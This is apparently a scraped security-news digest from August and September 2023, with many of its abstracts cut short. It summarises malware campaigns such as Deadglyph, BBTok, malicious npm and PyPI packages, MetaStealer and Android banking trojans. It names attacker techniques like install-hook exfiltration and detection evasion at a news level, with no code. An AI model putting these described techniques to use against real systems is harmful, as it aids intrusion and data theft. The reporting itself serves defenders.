Cybersecurity researchers have discovered a previously undocumented advanced backdoor dubbed Deadglyph employed by a threat actor known as Stealth Falcon as part of a cyber espionage campaign. "Deadglyph's architecture is unusual as it consists of cooperating components – one a native x64 binary, the other a .NET assembly," ESET said in a new report shared with The Hacker News. "This combination is unusual because malware typically uses only one programming language for its components. This difference might indicate separate development of those two components while also taking advantage of unique features of the distinct programming languages they utilize." It's also suspected that the use of different programming languages is a deliberate tactic to hinder analysis, making it a lot more challenging to navigate and debug. Unlike other traditional backdoors of its kind, the commands are received from an actor-controlled server in the form of additiThe Hacker News
September 22, 2023
New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks Full Text
Abstract
An active malware campaign targeting Latin America is dispensing a new variant of a banking trojan called BBTok , particularly users in Brazil and Mexico. "The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering its 2FA code to their bank accounts or into entering their payment card number," Check Point said in research published this week. The payloads are generated by a custom server-side PowerShell script and are unique for each victim based on the operating system and country, while being delivered via phishing emails that leverage a variety of file types. BBTok is a Windows-based banking malware that first surfaced in 2020. It's equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate keyboard, and serve fake login pages for banks operating in the two countries. The attack chaThe Hacker News
September 21, 2023
Researchers Raise Red Flag on P2PInfect Malware with 600x Activity Surge Full Text
Abstract
The peer-to-peer (P2) worm known as P2PInfect has witnessed a surge in activity since late August 2023, witnessing a 600x jump between September 12 and 19, 2023. "This increase in P2PInfect traffic has coincided with a growing number of variants seen in the wild, suggesting that the malware's developers are operating at an extremely high development cadence," Cado Security researcher Matt Muir said in a report published Wednesday. A majority of the compromises have been reported in China, the U.S., Germany, the U.K., Singapore, Hong Kong, and Japan. P2PInfect first came to light in July 2023 for its ability to breach poorly secured Redis instances. The threat actors behind the campaign have since resorted to different approaches for initial access, including the abuse of the database's replication feature to deliver the malware. Cado Security said it has observed an increase in initial access events attributable to P2PInfect in which the Redis SLAVEOF commandThe Hacker News
September 20, 2023
Fresh Wave of Malicious npm Packages Threaten Kubernetes Configs and SSH Keys Full Text
Abstract
Cybersecurity researchers have discovered a fresh batch of malicious packages in the npm package registry that are designed to exfiltrate Kubernetes configurations and SSH keys from compromised machines to a remote server. Sonatype said it has discovered 14 different npm packages so far: @am-fe/hooks, @am-fe/provider, @am-fe/request, @am-fe/utils, @am-fe/watermark, @am-fe/watermark-core, @dynamic-form-components/mui, @dynamic-form-components/shineout, @expue/app, @fixedwidthtable/fixedwidthtable, @soc-fe/use, @spgy/eslint-plugin-spgy-fe, @virtualsearchtable/virtualsearchtable, and shineouts. "These packages [...] attempt to impersonate JavaScript libraries and components, such as ESLint plugins and TypeScript SDK tools," the software supply chain security firm said . "But, upon installation, multiple versions of the packages were seen running obfuscated code to collect and siphon sensitive files from the target machine." Along with Kubernetes config and SSH keThe Hacker News
September 20, 2023
Malicious NPM Packages Caught Exfiltrating Kubernetes Config, SSH Keys Full Text
Abstract
The malicious software packages impersonate legitimate JavaScript libraries and components, but upon installation, they run obfuscated code to collect and siphon sensitive files.Cyware
September 19, 2023
Inside the Code of a New XWorm Variant Full Text
Abstract
XWorm is a relatively new representative of the remote access trojan cohort that has already earned its spot among the most persistent threats across the globe. Since 2022, when it was first observed by researchers, it has undergone a number of major updates that have significantly enhanced its functionality and solidified its staying power. The analyst team at ANY.RUN came across the newest version of the malware and could not refuse the opportunity of taking it apart to examine XWorm mechanics configurations. Here is how they did it and what they found. The XWorm sample's source The sample in question was discovered in ANY. RUN's database of malware, a repository containing detailed analysis reports on all files and links that have been uploaded by users of the sandbox in public mode. A quick look at the results of the analysis revealed that the sample was initially distributed via MediaFire, a file-hosting service. The malware was packaged in a RAR archive and pThe Hacker News
September 18, 2023
Earth Lusca Employs New Linux Backdoor, Uses Cobalt Strike for Lateral Movement Full Text
Abstract
Earth Lusca, a China-linked threat actor, has developed a Linux variant of the backdoor malware SprySOCKS, which originated from the open-source Windows backdoor Trochilus, indicating their continued active operations and expansion.Cyware
September 18, 2023
Hook: New Android Banking Trojan That Expands on ERMAC’s Legacy Full Text
Abstract
A new analysis of the Android banking trojan known as Hook has revealed that it's based on its predecessor called ERMAC. "The ERMAC source code was used as a base for Hook," NCC Group security researchers Joshua Kamp and Alberto Segura said in a technical analysis published last week. "All commands (30 in total) that the malware operator can send to a device infected with ERMAC malware, also exist in Hook. The code implementation for these commands is nearly identical." Hook was first documented by ThreatFabric in January 2023, describing it as a " ERMAC fork" that's offered for sale for $7,000 per month. Both the strains are the work of a malware author called DukeEugene. That said, Hook expands on ERMAC's functionalities with more capabilities, supporting as many as 38 additional commands when compared to the latter. ERMAC's core features are designed to send SMS messages, display a phishing window on top of a legitimate app, eThe Hacker News
September 15, 2023
New Python NodeStealer Goes Beyond Facebook Credentials, Now Stealing All Browser Cookies and Login Credentials Full Text
Abstract
The campaign uses batch files distributed via Facebook messages, utilizing images of defective products as bait, and stealing credentials and cookies from multiple browsers, not just Facebook, increasing the risk of targeted attacks.Cyware
September 15, 2023
NodeStealer Malware Now Targets Facebook Business Accounts on Multiple Browsers Full Text
Abstract
An ongoing campaign is targeting Facebook Business accounts with bogus messages to harvest victims' credentials using a variant of the Python-based NodeStealer and potentially take over their accounts for follow-on malicious activities. "The attacks are reaching victims mainly in Southern Europe and North America across different segments, led by the manufacturing services and technology sectors," Netskope Threat Labs researcher Jan Michael said in an analysis published Thursday. First documented by Meta in May 2023, NodeStealer originated as a JavaScript malware capable of pilfering cookies and passwords from web browsers to compromise Facebook, Gmail, and Outlook accounts. Palo Alto Networks Unit 42, last month, revealed a separate attack wave that took place in December 2022 using a Python version of the malware, with select iterations also designed to conduct cryptocurrency theft. The latest findings from Netskope suggest the Vietnamese threat actors beThe Hacker News
September 15, 2023
LokiBot Information Stealer Packs Fresh Infection Strategies Full Text
Abstract
The malware targets Microsoft users and steals various types of data, including email credentials, payment card information, and cryptocurrency passwords. It is particularly appealing to less technically skilled individuals due to its ease of use.Cyware
September 14, 2023
Exiled Russian Journalist’s Phone Hacked With Pegasus Spyware Full Text
Abstract
The notorious spyware was reportedly installed on the iPhone of Galina Timchenko, owner of the Russian independent media outlet Meduza, while she was in Berlin for a private conference with other Russian independent journalists living in exile.Cyware
September 14, 2023
RedLine and Vidar Stealers Abuse EV Certificates, Shift to Ransomware Payloads Full Text
Abstract
Threat actors are using EV code signing certificates to distribute both information-stealing malware and ransomware, indicating a streamlining of operations and the need for stronger security measures.Cyware
September 13, 2023
Newly Discovered MetaStealer Malware Targets macOS Users Full Text
Abstract
A new MetaStealer malware has surfaced in the wild, targeting macOS business users. Written in Golang, the malware is distributed via social engineering tactics, where attackers pose as fake design clients and lure victims into executing malicious payloads. Apple’s XProtect update v2170 contains a ... Read MoreCyware
September 12, 2023
OriginBotnet, RedLine Clipper, and AgentTesla Distributed Via Phishing Emails Full Text
Abstract
A dark cloud of threats hovers over Windows users as security researchers uncovered a phishing campaign delivering Agent Tesla, OriginBotnet, and RedLine Clipper via maldocs. Attackers can extract a wide range of data from compromised systems, such as credentials, crypto wallet data, and other sens ... Read MoreCyware
September 12, 2023
Beware: MetaStealer Malware Targets Apple macOS in Recent Attacks Full Text
Abstract
A new information stealer malware called MetaStealer has set its sights on Apple macOS, making the latest in a growing list of stealer families focused on the operating system after Stealer , Pureland , Atomic Stealer , and Realst . "Threat actors are proactively targeting macOS businesses by posing as fake clients in order to socially engineer victims into launching malicious payloads," SentinelOne security researcher Phil Stokes said in a Monday analysis. In these attacks, MetaStealer is distributed in the form of rogue application bundles in the disk image format (DMG), with targets approached through threat actors posing as prospective design clients in order to share a password-protected ZIP archive containing the DMG file. Other instances have involved the malware masquerading as Adobe files or installers for Adobe Photoshop. Evidence gathered so far shows that MetaStealer artifacts began appearing in the wild in March 2023. The most recent sample was uploadeThe Hacker News
September 12, 2023
New Family of Obfuscated Go Info-stealers ‘MetaStealer’ Spread in Targeted Attacks Full Text
Abstract
Unlike other recent macOS malware, MetaStealer relies on social engineering tactics to persuade victims to launch malicious payloads, often disguised as legitimate files or software.Cyware
September 11, 2023
New HijackLoader Malware Used to Distribute Various Malware Families Full Text
Abstract
A new malware loader known as HijackLoader has gained popularity among cybercriminals for distributing various payloads, including DanaBot, SystemBC, and RedLine Stealer. HijackLoader uses a modular architecture that facilitates threat actors to perform code injection and execution. Organizations m ... Read MoreCyware
September 11, 2023
New HijackLoader Modular Malware Loader Making Waves in the Cybercrime World Full Text
Abstract
A new malware loader called HijackLoader is gaining traction among the cybercriminal community to deliver various payloads such as DanaBot , SystemBC , and RedLine Stealer . "Even though HijackLoader does not contain advanced features, it is capable of using a variety of modules for code injection and execution since it uses a modular architecture, a feature that most loaders do not have," Zscaler ThreatLabz researcher Nikolaos Pantazopoulos said . First observed by the company in July 2023, the malware employs a number of techniques to fly under the radar. This involves using syscalls to evade monitoring from security solutions, monitoring processes associated with security software based on an embedded blocklist, and putting off code execution by as much as 40 seconds at different stages. The exact initial access vector used to infiltrate targets is currently not known. The anti-analysis aspects notwithstanding, the loader packs in a main instrumentation module thatThe Hacker News
September 09, 2023
Millions Infected by Spyware Hidden in Fake Telegram Apps on Google Play Full Text
Abstract
Spyware masquerading as modified versions of Telegram have been spotted in the Google Play Store that's designed to harvest sensitive information from compromised Android devices. According to Kaspersky security researcher Igor Golovin, the apps come with nefarious features to capture and exfiltrate names, user IDs, contacts, phone numbers, and chat messages to an actor-controlled server. The activity has been codenamed Evil Telegram by the Russian cybersecurity company. The apps have been collectively downloaded millions of times before they were taken down by Google. Their details are as follows - 電報,紙飛機-TG繁體中文版 or 電報,小飛機-TG繁體中文版 (org.telegram.messenger.wab) - 10 million+ downloads TG繁體中文版-電報,紙飛機 (org.telegram.messenger.wab) - 50,000+ downloads 电报,纸飞机-TG简体中文版 (org.telegram.messenger.wob) - 50,000+ downloads 电报,纸飞机-TG简体中文版 (org.tgcn.messenger.wob) - 10,000+ downloads ئۇيغۇر تىلى TG - تېلېگرامما (org.telegram.messenger.wcb) - 100+ downloads The last app on the list tranThe Hacker News
September 9, 2023
Weaponized Windows Installers Target Graphic Designers in Crypto Heist Full Text
Abstract
Attackers execute malicious scripts through a feature of the installer called Custom Action, dropping several payloads — including the M3_Mini_Rat client stub backdoor, Ethereum mining malware PhoenixMiner, and multi-coin mining threat lolMiner.Cyware
September 8, 2023
New BlueShell Malware Attacks Windows, Linux, and Mac Full Text
Abstract
The BlueShell malware was found being used by various threat actors to target systems running Windows, Linux, and other operating systems in Korea and Thailand. The Dalbit Group, a China-based threat group, has been identified as using a customized version of BlueShell. To mitigate such threats, or ... Read MoreCyware
September 8, 2023
New Atomic Stealer Variant Used in a Malvertising Campaign Full Text
Abstract
Researchers at Malwarebytes have identified a new version of the Atomic Stealer macOS malware that employs a technique to bypass the operating system's Gatekeeper security feature. The malware masquerades as the popular TradingView platform. It is important to deploy an antivirus with real-time pro ... Read MoreCyware
September 7, 2023
Mac Users Targeted in New Malvertising Campaign Delivering Atomic Stealer Full Text
Abstract
Attackers are using phishing sites and search engine ads to trick victims into downloading the malware, highlighting the importance of verifying the authenticity of downloaded programs.Cyware
September 6, 2023
Threat Actors Target NPM, PyPI, and RubyGems Developers Full Text
Abstract
A new cyber campaign has emerged, with threat actors uploading malicious packages to PyPI, NPM, and RubyGems repositories, posing a significant threat to macOS user data. The malicious packages would collect system information and exfiltrate it to attacker-controlled servers. Security firm Phylum i ... Read MoreCyware
September 6, 2023
Bogus URL Shorteners Go Mobile-Only in AdSense Fraud Campaign Full Text
Abstract
The attackers have implemented multiple layers of defense to protect their Google AdSense accounts, including JavaScript execution, mobile user agent checks, user interaction requirements, and server-side user agent checks.Cyware
September 6, 2023
New Agent Tesla Variant Being Spread by Specially Crafted Excel Document Full Text
Abstract
A new variant of the Agent Tesla malware is spreading through a phishing campaign, exploiting the CVE-2017-11882/CVE-2018-0802 vulnerability to gain access to victims' devices and steal sensitive information.Cyware
September 6, 2023
New Chae$ 4 Strain Targets Financial and Logistics Customers Full Text
Abstract
A reworked variant of the Chaes malware, Chae$ 4, is causing havoc in the banking and logistics sectors with significant overhauls. It has been completely rewritten in Python to bypass traditional security defenses and improve communication protocols. It's essential to regularly update and pa ... Read MoreCyware
September 05, 2023
New BLISTER Malware Update Fuelling Stealthy Network Infiltration Full Text
Abstract
An updated version of a malware loader known as BLISTER is being used as part of SocGholish infection chains to distribute an open-source command-and-control (C2) framework called Mythic . "New BLISTER update includes keying feature that allows for precise targeting of victim networks and lowers exposure within VM/sandbox environments," Elastic Security Labs researchers Salim Bitam and Daniel Stepanic said in a technical report published late last month. BLISTER was first uncovered by the company in December 2021 acting as a conduit to distribute Cobalt Strike and BitRAT payloads on compromised systems. The use of the malware alongside SocGholish (aka FakeUpdates), a JavaScript-based downloader malware, to deliver Mythic was previously disclosed by Palo Alto Networks Unit 42 in July 2023. In these attacks, BLISTER is embedded within a legitimate VLC Media Player library in an attempt to get around security software and infiltrate victim environments. Both SocGholish andThe Hacker News
September 5, 2023
New Chaes Malware Variant Targeting Financial and Logistics Customers Full Text
Abstract
This new variant, primarily targeting logistics and financial sectors, has undergone significant changes, including being rewritten in Python, enhanced communication protocols, and new modules.Cyware
September 05, 2023
New Python Variant of Chaes Malware Targets Banking and Logistics Industries Full Text
Abstract
Banking and logistics industries are under the onslaught of a reworked variant of a malware called Chaes . "It has undergone major overhauls: from being rewritten entirely in Python, which resulted in lower detection rates by traditional defense systems, to a comprehensive redesign and an enhanced communication protocol," Morphisec said in a new detailed technical write-up shared with The Hacker News. Chaes, which first emerged in 2020, is known to target e-commerce customers in Latin America, particularly Brazil, to steal sensitive financial information. A subsequent analysis from Avast in early 2022 found that the threat actors behind the operation, who call themselves Lucifer, had breached more than 800 WordPress websites to deliver Chaes to users of Banco do Brasil, Loja Integrada, Mercado Bitcoin, Mercado Livre, and Mercado Pago. Further updates were detected in December 2022, when Brazilian cybersecurity company Tempest Security Intelligence uncovered the malThe Hacker News
September 5, 2023
Unraveling EternalBlue: Inside the WannaCry’s Enabler Full Text
Abstract
EternalBlue exploits a vulnerability in the Microsoft implementation of the Server Message Block (SMB) Protocol. This dupes an unpatched Windows machine into allowing illegitimate data packets into the legitimate network.Cyware
September 04, 2023
Beware of MalDoc in PDF: A New Polyglot Attack Allowing Attackers to Evade Antivirus Full Text
Abstract
Cybersecurity researchers have called attention to a new antivirus evasion technique that involves embedding a malicious Microsoft Word file into a PDF file. The sneaky method, dubbed MalDoc in PDF by JPCERT/CC, is said to have been employed in an in-the-wild attack in July 2023. "A file created with MalDoc in PDF can be opened in Word even though it has magic numbers and file structure of PDF," researchers Yuma Masubuchi and Kota Kino said . "If the file has a configured macro, by opening it in Word, VBS runs and performs malicious behaviors." Such specially crafted files are called polyglots as they are a legitimate form of multiple different file types, in this case, both PDF and Word (DOC). This entails adding an MHT file created in Word and with a macro attached after the PDF file object. The end result is a valid PDF file that can also be opened in the Word application. Put differently; the PDF document embeds within itself a Word document with a VBThe Hacker News
September 1, 2023 – Breach
Data Breach Could Affect More Than 100,000 in Pima County Full Text
Abstract
More than 100,000 Pima County residents could be affected by a nationwide data breach that affected the company that handled COVID-19 case investigations and contact tracing here, officials say.Cyware
September 01, 2023
Russian State-Backed ‘Infamous Chisel’ Android Malware Targets Ukrainian Military Full Text
Abstract
Cybersecurity and intelligence agencies from Australia, Canada, New Zealand, the U.K., and the U.S. on Thursday disclosed details of a mobile malware strain targeting Android devices used by the Ukrainian military. The malicious software, dubbed Infamous Chisel and attributed to a Russian state-sponsored actor called Sandworm, has capabilities to "enable unauthorized access to compromised devices, scan files, monitor traffic, and periodically steal sensitive information." Some aspects of the malware were uncovered by the Security Service of Ukraine (SBU) earlier in August, highlighting unsuccessful attempts on part of the adversary to penetrate Ukrainian military networks and gather valuable intelligence. It's said that Russian forces captured tablets used by Ukraine on the battlefield, using them as a foothold to remotely disseminate the malware to other devices by using the Android Debug Bridge ( ADB ) command-line tool. Sandworm, also known by the names FROZENBARENTS, IrThe Hacker News
August 31, 2023
SapphireStealer Malware: A Gateway to Espionage and Ransomware Operations Full Text
Abstract
An open-source .NET-based information stealer malware dubbed SapphireStealer is being used by multiple entities to enhance its capabilities and spawn their own bespoke variants. "Information-stealing malware like SapphireStealer can be used to obtain sensitive information, including corporate credentials, which are often resold to other threat actors who leverage the access for additional attacks, including operations related to espionage or ransomware/extortion," Cisco Talos researcher Edmund Brumaghin said in a report shared with The Hacker News. An entire ecosystem has developed over time that allows both financially motivated and nation-state actors to use services from purveyors of stealer malware to carry out various kinds of attacks. Viewed in that light, such malware not only represents an evolution of the cybercrime-as-a-service (CaaS) model, they also offer other threat actors to monetize the stolen data to distribute ransomware, conduct data theft, and other maliciouThe Hacker News
August 31, 2023
North Korean Hackers Deploy New Malicious Python Packages in PyPI Repository Full Text
Abstract
Three additional rogue Python packages have been discovered in the Package Index (PyPI) repository as part of an ongoing malicious software supply chain campaign called VMConnect , with signs pointing to the involvement of North Korean state-sponsored threat actors. The findings come from ReversingLabs, which detected the packages tablediter, request-plus, and requestspro. First disclosed at the start of the month by the company and Sonatype, VMConnect refers to a collection of Python packages that mimic popular open-source Python tools to download an unknown second-stage malware. The latest tranche is no different, with ReversingLabs noting that the bad actors are disguising their packages and making them appear trustworthy by using typosquatting techniques to impersonate prettytable and requests and confuse developers. The nefarious code within tablediter is designed to run in an endless execution loop in which a remote server is polled periodically to retrieve and executeThe Hacker News
August 31, 2023
BadBazaar Espionage Tool Targets Android Users Full Text
Abstract
ESET discovered two active campaigns distributing trojanized Signal and Telegram apps that aim to exfiltrate user data and spy on victims’ communications. They have been spreading the BadBazaar Android spyware. Mitigation includes cautious app selection, avoiding suspicious sources, and maintaining ... Read MoreCyware
August 30, 2023
MMRat Android Trojan Executes Remote Financial Fraud Through Accessibility Feature Full Text
Abstract
A previously undocumented Android banking trojan dubbed MMRat has been observed targeting mobile users in Southeast Asia since late June 2023 to remotely commandeer the devices and perform financial fraud. "The malware, named after its distinctive package name com.mm.user, can capture user input and screen content, and can also remotely control victim devices through various techniques, enabling its operators to carry out bank fraud on the victim's device," Trend Micro said . What makes MMRat stand apart from others of its kind is the use of a customized command-and-control (C2) protocol based on protocol buffers (aka protobuf ) to efficiently transfer large volumes of data from compromised handsets, demonstrating the growing sophistication of Android malware. Possible targets based on the language used in the phishing pages include Indonesia, Vietnam, Singapore, and the Philippines. The entry point of the attacks is a network of phishing sites that mimic officiThe Hacker News
August 30, 2023
China-Linked BadBazaar Android Spyware Targeting Signal and Telegram Users Full Text
Abstract
Cybersecurity researchers have discovered malicious Android apps for Signal and Telegram distributed via the Google Play Store and Samsung Galaxy Store that are engineered to deliver the BadBazaar spyware on infected devices. Slovakian company ESET attributed the campaign to a China-linked actor called GREF . "Most likely active since July 2020 and since July 2022, respectively, the campaigns have distributed the Android BadBazaar espionage code through the Google Play store, Samsung Galaxy Store, and dedicated websites representing the malicious apps Signal Plus Messenger and FlyGram," security researcher Lukáš Štefanko said in a new report shared with The Hacker News. Victims have been primarily detected in Germany, Poland, and the U.S., followed by Ukraine, Australia, Brazil, Denmark, Congo-Kinshasa, Hong Kong, Hungary, Lithuania, the Netherlands, Portugal, Singapore, Spain, and Yemen. BadBazaar was first documented by Lookout in November 2022 as targeting the UThe Hacker News
August 30, 2023
Malicious npm Packages Aim to Target Developers for Source Code Theft Full Text
Abstract
An unknown threat actor is leveraging malicious npm packages to target developers with an aim to steal source code and configuration files from victim machines, a sign of how threats lurk consistently in open-source repositories. "The threat actor behind this campaign has been linked to malicious activity dating back to 2021," software supply chain security firm Checkmarx said in a report shared with The Hacker News. "Since then, they have continuously published malicious packages." The latest report is a continuation of the same campaign that Phylum disclosed at the start of the month in which a number of npm modules were engineered to exfiltrate valuable information to a remote server. The packages, by design, are configured to execute immediately post-installation by means of a postinstall hook defined in the package.json file. It triggers the launch of preinstall.js, which spawns index.js to capture the system metadata as well as harvest source code andThe Hacker News
August 29, 2023
DarkGate Malware Activity Spikes as Developer Rents Out Malware to Affiliates Full Text
Abstract
A new malspam campaign has been observed deploying an off-the-shelf malware called DarkGate . "The current spike in DarkGate malware activity is plausible given the fact that the developer of the malware has recently started to rent out the malware to a limited number of affiliates," Telekom Security said in a report published last week. The latest report build onn recent findings from security researcher Igal Lytzki, who detailed a "high volume campaign" that leverages hijacked email threads to trick recipients into downloading the malware. The attack commences with a phishing URL that, when clicked, passes through a traffic direction system ( TDS ) to take the victim to an MSI payload subject to certain conditions. This includes the presence of a refresh header in the HTTP response. Opening the MSI file triggers a multi-stage process that incorporates an AutoIt script to execute shellcode that acts as a conduit to decrypt and launch DarkGate via a crypteThe Hacker News
August 29, 2023
Android Banking Trojan MMRat Carries Out Bank Fraud via Fake App Stores Full Text
Abstract
MMRat uses customized command-and-control protocols and remains undetected on VirusTotal, highlighting its ability to evade detection and exploit large volumes of data transfer.Cyware
August 28, 2023
MalDoc in PDFs: Hiding malicious Word docs in PDF files Full Text
Abstract
Japan's computer emergency response team (JPCERT) is sharing a new 'MalDoc in PDF' attack detected in July 2023 that bypasses detection by embedding malicious Word files into PDFs.BleepingComputer
August 28, 2023
Developers Beware: Malicious Rust Libraries Caught Transmitting OS Info to Telegram Channel Full Text
Abstract
In yet another sign that developers continue to be targets of software supply chain attacks, a number of malicious packages have been discovered on the Rust programming language's crate registry. The libraries, uploaded between August 14 and 16, 2023, were published by a user named "amaperf," Phylum said in a report published last week. The names of the packages, now taken down, are as follows: postgress, if-cfg, xrvrv, serd, oncecell, lazystatic, and envlogger. It's not clear what the end goal of the campaign was, but the suspicious modules were found to harbor functionalities to capture the operating system information (i.e., Windows, Linux, macOS, or Unknown) and transmit the data to a hard-coded Telegram channel via the messaging platform's API. This suggests that the campaign may have been in its early stages and that the threat actor may have been casting a wide net to compromise as many developer machines as possible to deliver rogue updates with impThe Hacker News
August 26, 2023
The Three Malware Loaders Behind 80% of Incidents Full Text
Abstract
QakBot, SocGholish, and Raspberry Robin are the most prevalent malware loaders causing havoc for security teams, with QakBot being the most versatile and persistent threat.Cyware
August 24, 2023
Smoke Loader Drops Whiffy Recon Wi-Fi Scanning and Geolocation Malware Full Text
Abstract
Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. Persistence is achieved by means of a shortcut that's added to the Windows Startup folder.Cyware
August 24, 2023
Lazarus Group Exploits ManageEngine Vulnerability to Deploy QuiteRAT Full Text
Abstract
QuiteRAT is clearly an evolution of MagicRAT. While MagicRAT is a bigger, bulkier malware family averaging around 18MB in size, QuiteRAT is a much much smaller implementation, averaging around 4 to 5MB in size.Cyware
August 24, 2023
New “Whiffy Recon” Malware Triangulates Infected Device Location via Wi-Fi Every Minute Full Text
Abstract
The SmokeLoader malware is being used to deliver a new Wi-Fi scanning malware strain called Whiffy Recon on compromised Windows machines. "The new malware strain has only one operation. Every 60 seconds it triangulates the infected systems' positions by scanning nearby Wi-Fi access points as a data point for Google's geolocation API," Secureworks Counter Threat Unit (CTU) said in a statement shared with The Hacker News. "The location returned by Google's Geolocation API is then sent back to the adversary." SmokeLoader , as the name implies, is a loader malware whose sole purpose is to drop additional payloads onto a host. Since 2014, the malware has been offered for sale to Russian-based threat actors. It's traditionally distributed via phishing emails. Whiffy Recon works by checking for the WLAN AutoConfig service (WLANSVC) on the infected system and terminating itself if the service name doesn't exist. It's worth noting that thThe Hacker News
August 23, 2023
Over a Dozen Malicious npm Packages Target Roblox Game Developers Full Text
Abstract
More than a dozen malicious packages have been discovered on the npm package repository since the start of August 2023 with capabilities to deploy an open-source information stealer called Luna Token Grabber on systems belonging to Roblox developers. The ongoing campaign, first detected on August 1 by ReversingLabs, employs modules that masquerade as the legitimate package noblox.js , an API wrapper that's used to create scripts that interact with the Roblox gaming platform. The software supply chain security company described the activity as a "replay of an attack uncovered two years ago" in October 2021. "The malicious packages [...] reproduce code from the legitimate noblox.js package but add malicious, information-stealing functions," software threat researcher Lucija Valentić said in a Tuesday analysis. The packages were cumulatively downloaded 963 times before they were taken down. The names of the rogue packages are as follows - noblox.js-vThe Hacker News
August 22, 2023
Thousands of Android Malware Apps Use Stealthy APKs to Bypass Security Full Text
Abstract
Threat actors are reportedly exploiting APK files that employ unknown or unsupported compression methods to bypass malware analysis, warned cybersecurity firm Zimperium. The approach hinders decompilation efforts while still enabling installation on Android devices running OS versions above Android ... Read MoreCyware
August 22, 2023
New Variant of XLoader macOS Malware Disguised as ‘OfficeNote’ Productivity App Full Text
Abstract
A new variant of an Apple macOS malware called XLoader has surfaced in the wild, masquerading its malicious features under the guise of an office productivity app called "OfficeNote." "The new version of XLoader is bundled inside a standard Apple disk image with the name OfficeNote.dmg," SentinelOne security researchers Dinesh Devadoss and Phil Stokes said in a Monday analysis. "The application contained within is signed with the developer signature MAIT JAKHU (54YDV8NU9C)." XLoader , first detected in 2020, is considered a successor to Formbook and is an information stealer and keylogger offered under the malware-as-a-service (MaaS) model. A macOS variant of the malware emerged in July 2021, distributed as a Java program in the form of a compiled .JAR file. "Such files require the Java Runtime Environment, and for that reason the malicious .jar file will not execute on a macOS install out of the box, since Apple stopped shipping JRE withThe Hacker News
August 21, 2023
HiatusRAT Returns after a Hiatus in a Fresh Wave of Attacks Full Text
Abstract
The HiatusRAT malware group reemerged to target Taiwan-based organizations and a U.S. military procurement system allegedly to snoop on military contracts. The audacity of threat actors is evident in their disregard for previous disclosures and their minimal efforts to change their payload servers. ... Read MoreCyware
August 21, 2023
This Malware Turned Thousands of Hacked Windows and macOS PCs into Proxy Servers Full Text
Abstract
Threat actors are leveraging access to malware-infected Windows and macOS machines to deliver a proxy server application and use them as exit nodes to reroute proxy requests. According to AT&T Alien Labs, the unnamed company that offers the proxy service operates more than 400,000 proxy exit nodes, although it's not immediately clear how many of them were co-opted by malware installed on infected machines without user knowledge and interaction. "Although the proxy website claims that its exit nodes come only from users who have been informed and agreed to the use of their device," the cybersecurity company said it found evidence where "malware writers are installing the proxy silently in infected systems." Multiple malware families have been observed delivering the proxy to users searching for cracked software and games. The proxy software, written in the Go programming language, is capable of targeting both Windows and macOS, with the former capable oThe Hacker News
August 21, 2023
HiatusRAT Malware Resurfaces: Taiwan Firms and U.S. Military Under Attack Full Text
Abstract
The threat actors behind the HiatusRAT malware have returned from their hiatus with a new wave of reconnaissance and targeting activity aimed at Taiwan-based organizations and a U.S. military procurement system. Besides recompiling malware samples for different architectures, the artifacts are said to have been hosted on new virtual private servers (VPSs), Lumen Black Lotus Labs said in a report published last week. The cybersecurity firm described the activity cluster as "brazen" and "one of the most audacious," indicating no signs of slowing down. The identity and the origin of the threat actors are presently unknown. Targets included commercial firms, such as semiconductor and chemical manufacturers, and at least one municipal government organization in Taiwan as well as a U.S. Department of Defense (DoD) server associated with submitting and retrieving proposals for defense contracts. HiatusRAT was first disclosed by the cybersecurity company in MarchThe Hacker News
August 19, 2023
WoofLocker Toolkit Hides Malicious Codes in Images to Run Tech Support Scams Full Text
Abstract
Cybersecurity researchers have detailed an updated version of an advanced fingerprinting and redirection toolkit called WoofLocker that's engineered to conduct tech support scams. The sophisticated traffic redirection scheme was first documented by Malwarebytes in January 2020, leveraging JavaScript embedded in compromised websites to perform anti-bot and web traffic filtering checks to serve next-stage JavaScript that redirects users to a browser locker (aka browlock). This redirection mechanism, in turn, makes use of steganographic tricks to conceal the JavaScript code within a PNG image that's served only when the validation phase is successful. Should a user be detected as a bot or not interesting traffic, a decoy PNG file without the malicious code is used. WoofLocker is also known as 404Browlock due to the fact that visiting the browlock URL directly without the appropriate redirection or one-time session token results in a 404 error page. The cybersecurity firm&The Hacker News
August 19, 2023
Thousands of Android Malware Apps Using Stealthy APK Compression to Evade Detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unknown or unsupported compression methods to elude malware analysis. That's according to findings from Zimperium, which found 3,300 artifacts leveraging such compression algorithms in the wild. 71 of the identified samples can be loaded on the operating system without any problems. There is no evidence that the apps were available on the Google Play Store at any point in time, indicating that the apps were distributed through other means, typically via untrusted app stores or social engineering to trick the victims into sideloading them. The APK files use "a technique that limits the possibility of decompiling the application for a large number of tools, reducing the possibilities of being analyzed," security researcher Fernando Ortega said . "In order to do that, the APK (which is in essence a ZIP file), is using an unsupported decompression method." The advantage of such an approach is its abilitThe Hacker News
August 19, 2023
Over 3,000 Android Malware spotted using unsupported/unknown compression methods to avoid detection Full Text
Abstract
Threat actors are using Android Package (APK) files with unsupported compression methods to prevent malware analysis. On June 28th, researchers from Zimperium zLab researchers observed that Joe Sandbox announced the availability of an Android APK that...Security Affairs
August 17, 2023
Large-Scale Campaign Delivers Proxy Server App to Make Systems Serve as Residential Exit Nodes Full Text
Abstract
The proxy application is silently installed by malware on infected systems without user knowledge or interaction, and it goes undetected by anti-virus software as it is signed.Cyware
August 15, 2023
QwixxRAT, a new Windows RAT appears in the threat landscape Full Text
Abstract
QwixxRAT is a new Windows remote access trojan (RAT) that is offered for sale through Telegram and Discord platforms. The Uptycs Threat Research team discovered the QwixxRAT (aka Telegram RAT) in early August 2023 while it was advertised through Telegram...Security Affairs
August 15, 2023
New Windows Malware QwixxRAT Appears in the Threat Landscape Full Text
Abstract
According to the experts, QwixxRAT is meticulously designed to steal a broad range of information, including data from browser histories, credit card details, screenshots, and keystrokes.Cyware
August 15, 2023
Gigabud RAT Android Banking Malware Targets Institutions Across Countries Full Text
Abstract
